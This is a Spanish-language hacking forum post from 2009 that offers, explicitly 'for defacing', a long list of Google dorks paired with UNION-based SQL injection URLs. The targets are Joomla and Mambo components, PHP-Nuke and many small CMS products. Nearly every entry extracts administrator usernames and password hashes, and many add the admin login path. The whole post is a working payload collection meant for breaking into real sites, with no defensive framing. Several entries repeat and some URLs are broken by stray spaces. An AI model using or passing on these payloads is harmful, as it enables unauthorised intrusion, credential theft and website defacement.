Varias inyecciones SQL

Antiguo 01-ago-2009, 20:41
Avatar de the_patox  
Ubicación: valpo
Mensajes: 107
Me Gusta recibidos: 2 (?)
Para defacing
algunos vienen con ejemplos

----------------------------

Dork: modules.php?name=Statistics Version PHP-Nuke
Exploit: modules.php?name=Search&type=c omments&%20%20%20query=&%20%20 %20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

----------------------------

Dork: allinurl:"com_newsletter"
Inyeccion: index.php?option=com_newslette r&ltemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*

----------------------------

Dork: allinurl:"com_fq"
Inyeccion: index.php?option=com_fq&ltemid =S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

----------------------------

Dork: allinurl:"com_mamml"
Inyeccion: index.php?option=com_mamml&lis tid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_glossary"
Inyeccion: index.php?option=com_glossary& func=display&ltemid=s@bun&cati d=-1%20union"20select%201,usernam e,password,4,5,6,7,8,9,10,11,1 2,13,14%20from%20mos_users--

-----------------------------

Dork: allinurl:"com_museopes"
Inyeccion: index.php?option=com_museopes& task=ansewer&ltemid=s@bun&cati d=s@bun&aid=-1/**/union/**/select/**/0,usermane,password,0x3a,0x3a, 3,0,0x3a,0,5,5,0,0x3a/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_recipes"
Inyeccion: index.php?option=com_recipes&l temid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),username,0x3a,5,6,7,8,9,1 0,11,12,0x3a,0x3a,0x3a,usernam e,username,0x3a,0x3a,0x3a,21,0 x3a/**/from/**/mos_users/*

-----------------------------

Dork: allinurl:"com_jokes"
Inyección: index.php?option=com_jokes&lte mid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7, 8/**/from/**/mos_users/*


-------------------------------

Dork: allinurl:"com_estateagent" = MUCHAS WEB CON ERROR MYSQL
Inyeccion: index.php?option=com_estateage nt&ltemid=S@BUN&func=showObjec t&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

-------------------------------

Dork: allinurl:"com_akogallery"
Inyección: index.php?option=com_akogaller y&ltemid=S@BUN&func=detail&id= 334455/**/union/**/select/**/null,null,concat(password,0x3a ),null,null,null,null,null,nul l,null,null,null,null,null,nul l,null,null,null,null,null,con cat(0x3a,username)/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_catalogshop"
Inyección: index.php?option=com_catalogsh op&ltemid=S@BUN&func=detail&id =-1/**/union/**/select/**/null,null,concat(password),3,4 ,5,6,7,8,9,10,11,12,concat(use rname)/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_restaurant"
Inyeccion: index.php?option=com_restauran t&ltemid=S@BUN&func=detail&i d=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0 ,username/**/from/**/mos_users/*

-------------------------------

Dork: allinurl:"com_neoconferences"
Inyección: index.php?option=com_neoconfer ences&ltemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%user_id=1=1/*

-------------------------------

Dork: Powered by GameSiteScript
Inyeccion: '+union+select+0,username,0,0, 0,0,0,0,0,0,0,0,0,0,password,0 ,0,0,0,0,0+from+members+where+ id='1

-----------------------------

Dork: Splatt Forum c By Splatt.it
Inyeccion: modules.php?name=Search&type=c omments&%20%20%20query=&%20%20 %20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

-----------------------------

Dork: allinurl:"modules.php?name=sea rch"
Inyección: UNION SELECT 0,user_id,username,user_passwo rd,0,0,0,0,0,0 FROM nuke_users/*

-----------------------------

Dork: allinurl:links.asp?action=what snew
Inyeccón: links.asp?action=reporterror&l inkID=2vepassword,0,0,0,0,0,0+ from +config

-----------------------------

Dork: "This site is powered by IndexScript"
Exploit: show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

-----------------------------

Koobi Pro 6.25 shop
Buscar En Google: Koobi Pro 6.25 shop
Inyeccion SQL:
index.php?p=shop&show=showdeta il&fid=ulus&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-----------------------------

Deface BlogSite
Buscar En Google: "Browse Blogs by Category"
Inyeccion SQL: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*
Ejemplo:
www.ejem.com/ index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*

------------------------------

Deface Bwired
Buscar En Google: "Powered by bwired" inurl:?newsID="
Inyeccion SQL:
index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a, 0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
Ejemplo:
www.pepito.com/ index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a, 0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

------------------------------

Deface Powered by AV Arcade
Buscar En Google: "Powered By AV Arcade"
Inyeccion SQL:
index.php?task=view_page&id=-1%20UNION%20SELECT%201,usernam e,password%20FROM%20 ava_users%20WHERE%20id=1
Ejemplo:
y queda algo asi...
www.pepito.com/ index.php?task=view_page&id=-1%20UNION%20SELECT%201,usernam e,password%20FROM%20 ava_users%20WHERE%20id=1

-------------------------------


Deface Powered by Xt-News
Buscar En Google: "Powered by Xt-News"
Inyeccion SQL:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,use r,null,null,mdp,null ,null,null,null,null,null%20FR OM%20xtnews_users%20 WHERE%20%20admin=1
Ejemplo:
www.pepito.com/ show_news.php?id_news=-1%20UNION%20SELECT%20%20id,use r,null,null,mdp,null ,null,null,null,null,null%20FR OM%20xtnews_users%20 WHERE%20%20admin=1


--------------------------------

Deface Supercali Event
Buscar En Google: "SuperCali Event Calendar"
Inyeccion SQL:
index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password ),4,5,0x677269642E70 6870/**/from/**/users/*
Ejemplo:
www.pepito.com/ index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password ),4,5,0x677269642E70 6870/**/from/**/users/*


--------------------------------

Deface Powered by eWriting 1.2.1
Buscaremos En Google: com_ewriting
Inyeecion SQL Para Los Que Son Joomla:
index.php?option=com_ewriting& Itemid=9999&func=selectcat&cat =-1+UNION+ALL+SELECT+1,2,concat( username,0x3a,password),4,5,6, 7,8,9,10+FROM+jos_users--
Inyeccions SQL Para Los Que Son Mambo:
index.php?option=com_ewriting& Itemid=9999&func=selectcat&cat =-1+UNION+ALL+SELECT+1,2,concat( username,0x3a,password),4,5,6, 7,8,9,10+FROM+mos_users--

---------------------------------

Deface KwsPHP v1.3.456 SQL
Buscar En Google: "index.php?mod=galerie"action= gal
Inyeccion SQL: index.php?mod=galerie&action=g al&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),c oncat(pseudo,0x3a,pass),4,5,6, 7/**/from/**/users/*

-----------------------------------

Deface Powered by Esy SQL
Buscar En Google: \"Powered by Esy\"
Inyeccion SQL: sections.php?op=viewarticle&ar tid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
Inyeccions SQL 2: sections.php?op=printpage&arti d=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

-----------------------------------

Deface showresult
Buscar En Google: allinurl: "index.php?p=poll"showresu lt
Inyeccion SQL: index.php?p=poll&showresult=1& poll_id=-1+union+select+concat(email,0x 3a,pass),1,2,3+from+kpro_user

----------------------------------

Deface Showlink
Buscar En Google: allinurl: "index.php?showlink"links
Inyeccion SQL: index.php?showlink=ulus&fid=ul us8&p=links&area=1&c ateg=-1+union+select+0,concat(email, 0x3a,pass),2+from+kp ro_user
Admin Login: login=admin/login.php

-----------------------------------

Deface powered by koobi-cms 4.3.0
Buscar En Google: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
Inyeccion SQL: index.php?area=1&p=gallery&act ion=showimages&galid=[SQL]
ESTE PARA EL ADMIN: -104+union+all+select+1,concat( email,0x203a3a20,pass),3+from+ koobi4_user/*

-----------------------------------

Deface Powered by BosClassifieds Classified Ads System
Buscar En Google: "Powered by BosClassifieds Classified Ads System"
Inyeccion SQL: site.c0m/bosclassifieds/index.php?cat=[SQL]
Solo Para Vercion: BosClassifieds 3.0

-------------------------------------

Deface pollBooth
Buscar En Google: allinurl: "pollBooth.php?op=results"poll ID
Inyeccion SQL: pollBooth.php?op=results&pollI D=-1+union+select+password,1,2,3+ from+users
[color=red]
Deface gallerypic img
Buscar En Google: allinurl: "index.php?p=gallerypic img_id"
Inyeccion SQL: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
Inyeccion SQL 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Admin Login: login=admin/login.php

-------------------------------------

Deface RS MAXSOFT
Buscar En Google: "RS MAXSOFT"
Inyeccion SQL: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x 3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm

-------------------------------------

Deface gallerypic img
Buscar En Google: allinurl: "index.php?p=gallerypic img_id"
Inyeccion SQL: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6,7,8+from+ koobi4_user
Inyeccion SQL 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(em ail,0x3a,pass),4,5,6,7,8+from+ koobi_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powere By SSWD
Buscar En Google: allinurl: "index.php?go=subcat"
Inyeccion SQL: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6/**/from/**/admin/*

-------------------------------------

Deface Powered by OpenLD
Buscar En Google: "Powered by OpenLD"
Inyeccion SQL: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value ,null,null,null,null ,null,null,null,null/**/FROM/**/settings--

-------------------------------------

Deface Index php P Shop
Buscar En Google: allinurl: "index php p shop"categ
Inyeccion SQL: index.php?p=shop&show=showdeta il&fid=ulus&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powered by Site Sift
Buscar En Google 1 : powered by Site Sift
Buscar En Google 2 : allinurl: "index php go addpage"
Buscar En Google 3 : allinurl: "index.php?go=detail id="
Inyecion SQL 1 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16/**/from/**/admin/*
Inyecion SQL 2 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20/**/from/**/admin/*
Admin Login: admin/login.php

-------------------------------------

Deface Showlink
Buscar En Google: allinurl: "index.php?showlink"links
Inyeccion SQL: index.php?showlink=ulus&fid=ul us8&p=links&area=1&categ=-1+union+select+0,concat(email, 0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

-------------------------------------

Deface Powered by eSyndiCat
Buscar Google: © 2005-2006 Powered by eSyndiCat Directory Software
Inyeccion SQL: news.php?id=-1%27%20union%20select%201,user name,password,4,5%20 from%20dir_admins/*
Admin Login: from%20dir_admins/*

-------------------------------------

Deface CartWeaver
Buscar En Google: allinurl:Results.cfm?category=
Inyecion SQL Para Sacar El Nombre Del Admin: Details.cfm?ProdID=1%20and%201 =convert(int,(select %20top%201%20admin_username%20 from%20tbl_adminuser s))
Inyecion SQL Para Sacar La Password: Details.cfm?ProdID=1%20and%201 =convert(int,(select %20top%201%20char(97)%2badmin_ password%20from%20tb l_adminusers))
Admin Login: /cw2/admin/

-------------------------------------

Deface Bwired
Buscar En Google: "Powered by bwired" inurl:?newsID=
Inyeccion SQL: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a, 0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

--------------------------------------

Deface Powered by Md-Pro
Buscar En Google: "Powered by Md-Pro"
Inyeccion SQL: index.php?module=Topics&func=v iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a ,pn_pass),null,null, null,null from md_users where pn_uid=2/*

--------------------------------------

DefaceBrowse Blogs by Category
Buscar En Google: allintext:"Browse Blogs by Category"
Inyeccion SQL: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,passw ord),4,5,6/**/FROM/**/websiteadmin_admin_users/*

--------------------------------------

Deface eMeeting Online Dating Software 5.2[/size]
Buscar En Google: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
Inyecion SQL 1 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pas sword),5,6,7,8,9,10/**/from/**/members/*
Inyecion SQL 2 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pas sword),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

---------------------------------------

Deface FlashGameScript 1.7
Buscar En Google: "Powered by FlashGameScript"
Inyeccion SQL 1 : index.php?func=member&user='+u nion+select+0,0,0,0, 0,0,0,0,0,0,username,password, 0,0,0,0,0,user_type+ from+members+where+user_type=2/*
Inyeccion SQL 2 : index.php?func=member&user='+u nion+select+0,0,0,0, 0,0,0,0,0,0,username,password, 0,0,0,0,user_type+fr om+members+where+user_type=2/*

---------------------------------------

Deface Foros MD-Pro
Buscar En Google: "Powered by Md-Pro"
Inyeccion SQL: index.php?module=Topics&func=v iew&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a ,pn_pass),null,null, null,null from md_users where pn_uid=2/*

---------------------------------------

Deface Miniweb
Buscar En Google: miniweb2/index.php?module=
Inyeccion SQL: index.php?module=blogwriter&hi storyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,u sername,password),4,5,6,7,8,9, 10/**/from/**/admin_access/*

---------------------------------------

Deface Iblog
Buscar En Google: Iblog
Inyeccion SQL: /comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+L OGIN+WHERE+ID=1

----------------------------------------

Deface Expert Advidior
Buscar En Google: intitle:"Answer Builder" Ask a question
Inyeccion SQL: /index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0 x3c623e,username,0x3 a,password,0x3c623e),9,10,11,1 2,13,14,15/**/FROM/**/admin/*

----------------------------------------

Deface Dvbbs Version 7.1.0 Sp1
Buscar En Google: "Powered By Dvbbs Version 7.1.0 Sp1"
Inyeccion SQL: /Data/Dvbbs7.mdb[/font]

-----------------------------------------

Deface Fundlink SQL
Lo Que Buscaremos En Google: allinurl: \"fundlinkllc.com\"
Inyeccions SQL: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

----------------------------------------

Deface PHP-Newsletter(cat_id) SQL
Lo Que Buscaremos En Google: llinurl: \"index.php?pgid\"cat_id
Inyeccion SQL: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,userna me,0x7c,password),0x 3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

----------------------------------------

Deface Powered by Com Endeavors SQL
Buscar En Google: allinurl: \"index.php?go=detail\"
Inyeccion SQL: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email ,0x3a,concat(usernam e,0x3a,password),1,1,1,1,1,1,2 ,2,2,2,2/**/from/**/admin/*where,limit,2--

-----------------------------------------

Deface Powered by niccell SQL
Buscar En Google: "powered by niccell"
Inyeccions SQL: list.php?pagenum=S@BUN&categor yid=9999+union+selec t+111,222,concat(login,0x3a,pa ssword),444+from+adm in_login/*

------------------------------------------

Deface Powered by SmallBiz eShop
Buscar En Google: Powered by SmallBiz eShop
Inyeccion SQL: index.php?content_id=-20'%20union%20select%20convert (concat(database(),c har(5,8)user(),char(5Cool,vers ion()),char)/*

------------------------------------------
     
Sigue en el foro:
Hacking
Últimos temas creados en Comunidad:
Herramientas




ElAfter.com 2005-2014 @ Algunos derechos reservados - Desarrollo por Digital Grid
Top